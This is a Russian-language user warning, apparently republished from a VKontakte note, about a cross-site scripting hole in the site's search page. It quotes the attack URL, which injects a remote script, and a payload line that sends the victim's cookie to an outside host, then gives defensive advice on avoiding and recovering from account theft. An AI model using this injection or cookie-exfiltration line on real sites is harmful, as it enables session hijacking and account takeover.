Эксплоит вКонтакте

Найдена очередная брешь в безопасности.

От Вас идут друзьям непонятные сообщения?
Вы проверяли свой компьютер на вирусы, но ничего не было найдено?
Вы меняли пароли, мейлы, но даже это не имело эффекта?

Объяснение
Объяснение простое - вконтакте подвержен неприятному эксплоиту, который срабатывает при посещении специально сформированной странички, внешний вид которой может быть самым разнообразным: от белого экрана или поддельной странички до полнофункционального портала.

Чем грозит эксплоит?
Он отправляет своему разработчику:
1) Ваш ID
2) Хэш вашего пароля вконтакте
3) Ваш email, на который зарегистрирован вконтакте
4) SID (Session ID)

Что это значит?
Это значит приблизительно следующее: сегодня вы открыли присланную любым способом (аська, вконтакте, форумы и пр.) ссылку, например, с интересной новостью, шокирующим откровением и пр.

Какие могут быть последствия экплоита?
А уже завтра Вы можете спамить друзей самой разнообразной информацией... или банально не найти свою страницу.
Вообще не найти, ни фото, ни страницы...
Ваша страница будет в руках другого человека.

Как это работает?
При переходе на заранее сформированную страницу в ней загружается невидимый iframe, который запускает эксплоит:

http://vkontakte.ru/gsearch.php?section=audio&c[section]=audio&c[q]=1&c[q]=1&c[%1223C/script%3E%3Cscript%20src%13Dhttp://xxx.com/xxx/1.js%3E%6C/script%6E]#c%5Bq%5D=1&c%5Bsection%5D=audio

Давайте попробуем разобрать этот код:
1. Экплоит акитвен в модуле gsearch.php
2. Использует раздел аудио
3. Создаёт один из параметров %1223C/script%3E%3Cscript%20src%13Dhttp://xxx.com/xxx/1.js%3E%6C/script%6E
4. Сделаем unescape этого участка - script src="http://xxx.com/xxx/1.js>script;;
5. Становится понятно, что в вашу страницу внедряется чужеродный джаваскрипт. Заглянем, что он делает.
6. http://na-s.ru/xxx/xxx.gif?"+document.cookie;
Это значит, что Ваш куки со всеми вашими личными данными будет передан злоумышленнику.
7. Злоумшленник просматривает Ваши данные и может делать с Вашей страницей всё, что угодно. Абсолютно всё.

Этот тип атаки относится к категории недостаточной фильтрации входных параметров.

Как не стать жертвой экплоита?
Я провёл много экспериментов. Все они говорят об одном, если Вы залогинены вконтакте, то любая запущенная страница может украсть Ваши данные.
Выходов 2:
1. Во время нахождения вконтакте не открывать любые сторонние сайты и не открывать любые Приложения. Если требуется что-то открыть - обязательно перед этим разлогиниться.
2. Использовать второй браузер (IE, FireFox, Opera, Safari 4). Например вконтакте пришла ссылка, необходимо найти информацию в интернете или нужно зайти на странный портал: вконтакте в первом браузере, всё остальное - во втором. Таким образом экплоит не сможет сработать в незалогиненном браузере и Вы сохраните свои данные приватными.

Что делать, если стал жертвой
1. Сменить пароль на вконтакте
2. Смириться с тем, что Ваш email, возможно, внесён в спамерские базы. Если он Вам неважен - удалить его

Послесловие
Заранее прошу прощения у коллег и друзей, кому от меня было отправлено предложение запустить Приложения. Эти приложения есть ничто иное, как этот самый экплоит, поэтому если Вы их запускали обязательно смените пароль вконтакте.

Не отрывайте чужие страницы!
Не запускайте непроверенные приложения!
Не забывайте нажимать ВЫХОД, покидая вконтакте, когда Вы не дома!

Ни спама Вам - ни вирусов! (с) Dr.Web

P.S. Так как код рабочий, то в него были внесены "портящие" элементы.
Администрации при необходимости будет предоставлен целостный блок кода.

---
Источник http://vkontakte.ru/note3534054_9172595
Перепечатка произведена с любезного разрешения автора: Гавриленко Алексея Олеговича